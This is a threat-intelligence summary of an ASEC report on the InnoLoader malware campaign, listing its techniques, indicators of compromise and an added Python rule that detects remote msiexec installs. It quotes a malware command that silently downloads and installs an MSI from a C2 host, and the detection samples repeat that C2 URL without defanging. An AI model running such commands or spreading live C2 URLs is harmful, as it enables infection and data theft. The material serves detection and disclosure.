ASEC reports a new malware type that is generated per download request, disguised as cracks and commercial tools. The installer UI hides malicious actions that execute when users click through the installation prompts, and a fresh sample is served for every download request. Hashtags: #InnoLoader #StealC #Socks5Systemz #Lu0Bot #Clicker #Opera #360Security #InnoDownloadPlugin
Keypoints
- For every download request, a new malware sample is created with a different hash but the same malicious capabilities.
- The malware shows an installer UI and triggers malicious behavior when the user clicks through the installation prompts (e.g., clicking “Next”).
- The C2-driven flow retrieves a download URL from the C2 response and repeats the process across multiple C2 URLs until all are processed.
- Investigations uncovered multiple components installed after infection: Infostealer StealC, Socks5Systemz (proxy), a Clicker (browser plugin), and legitimate software like Opera and 360 Security.
- The campaign uses InnoSetup to create the installer, with a plugin (InnoDownloadPlugin) that fetches an additional installer from the network.
- The attack chain includes obfuscated BAT and MSI files; Lu0Bot orchestrates the C2 communications and persistence, enabling installation of additional payloads.
MITRE Techniques
- [T1105] Ingress Tool Transfer – The malware downloads and executes files from the C2. “A file is downloaded and executed from the URL.” The download URL is located in the ‘Location’ entry of the C2 reply header. The files being executed in this process include both normal and malware files.
- [T1059.003] Windows Command Shell – The BAT file executes the command quoted in the report: “Execution command: msiexec /i hxxp://240601155351354.try.kyhd08[.]buzz/f/fvgbm0601001.msi /qn”
- [T1027] Obfuscated/Compressed Files or Information – “The BAT file being downloaded and executed by InnoLoader is obfuscated as shown below.”
- [T1547.001] Boot or Logon Autostart Execution – “for maintenance of persistence, Lu0Bot which installs StealC copies itself under the ProgramData directory and creates a shortcut in the Startup folder.”
- [T1071.001] Application Layer Protocol – The C2 communications utilize HTTP(S) URLs to download payloads and commands (e.g., multiple C2 URLs and “Location” headers).
- [T1090] Proxy – “Socks5Systemz that uses the infected system as a commercial proxy resource”.
- [T1059.003] Windows Command Shell – Additional note: the installer chains BAT and MSI execution, with the obfuscated BAT file launching the MSI payload silently via msiexec.
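As an added illustration (not code from the ASEC report), a detection check for the T1059.003 pattern quoted above: a Python function that flags msiexec.exe installing a package directly from a remote HTTP(S) URL, treating quiet mode (/qn, /q, /quiet) as higher severity because no installer UI is shown. The process-creation events are constructed; the only real value is the C2 host quoted in the report.

```python
import re
from urllib.parse import urlparse

# Tokens that make msiexec install a package; the next token is the package path or URL.
INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Quiet-mode switches: /q, /qn, /qb, /quiet (no UI or a basic one only).
QUIET_FLAGS = re.compile(r"(?<!\S)(/q[nb]?|/quiet)(?!\S)", re.IGNORECASE)


def analyze_msiexec(image: str, cmdline: str):
    """Return a finding dict if msiexec installs from a remote URL, else None."""
    if image.lower().rsplit("\\", 1)[-1] != "msiexec.exe":
        return None
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in INSTALL_SWITCHES and REMOTE_URL.fullmatch(tokens[i + 1]):
            url = tokens[i + 1].strip('"')
            quiet = QUIET_FLAGS.search(cmdline) is not None
            return {
                "url": url,
                "host": urlparse(url).hostname,
                "quiet": quiet,
                # Remote install alone is suspicious; silent remote install matches the report.
                "severity": "high" if quiet else "medium",
            }
    return None


def scan(events):
    """Run the rule over (image, command line) pairs and collect findings."""
    return [f for f in (analyze_msiexec(img, cmd) for img, cmd in events) if f]


# Constructed sample events; the first reuses the command quoted in the report.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\msiexec.exe",
     "msiexec /i http://240601155351354.try.kyhd08.buzz/f/fvgbm0601001.msi /qn"),
    ("C:\\Windows\\System32\\msiexec.exe",
     "msiexec /i C:\\Users\\Public\\Downloads\\vc_redist.x64.msi /qn"),   # local, benign
    ("C:\\Windows\\System32\\msiexec.exe",
     "msiexec /package https://updates.example.invalid/tool.msi"),        # remote, with UI
    ("C:\\Windows\\System32\\cmd.exe", "cmd /c echo hello"),               # not msiexec
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```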
Indicators of Compromise
- [MD5] 0738205d5a1472662b94561e004d9803 (BAT) – BAT file in the infection chain
- [MD5] b4c9d60f0e2c57c34ec6cb4a564c7ee1 (MSI) – MSI payload masquerading as a Visual C++ installer
- [MD5] 2e85211a7ab36e6d7e2a4a4b5d88b938 (Script, Lu0bot) – Malicious script component
- [MD5] 6b5730e49a37d6ffee273790449ac037 (DLL, StealC) – StealC payload component
- [MD5] 0283c9517cfb46faec1735262bd58654 (TXT, StealC) – Supporting text/payload artifact
- [Domain] InnoLoader C2 Domain – valuescent[.]website, caretouch[.]hair, monkeyagreement[.]fun, nightauthority[.]xyz
- [Domain] InnoLoader C2 Domain – cattlebusiness[.]icu, laughvein[.]hair, brotherpopcorn[.]website
- [URL] hxxp://240601155506901.try.kyhd08[.]buzz/f/fvgbm0601901.txt
- [URL] hxxp://93.123.39[.]135/129edec4272dc2c8.php
Read more: https://asec.ahnlab.com/en/67502/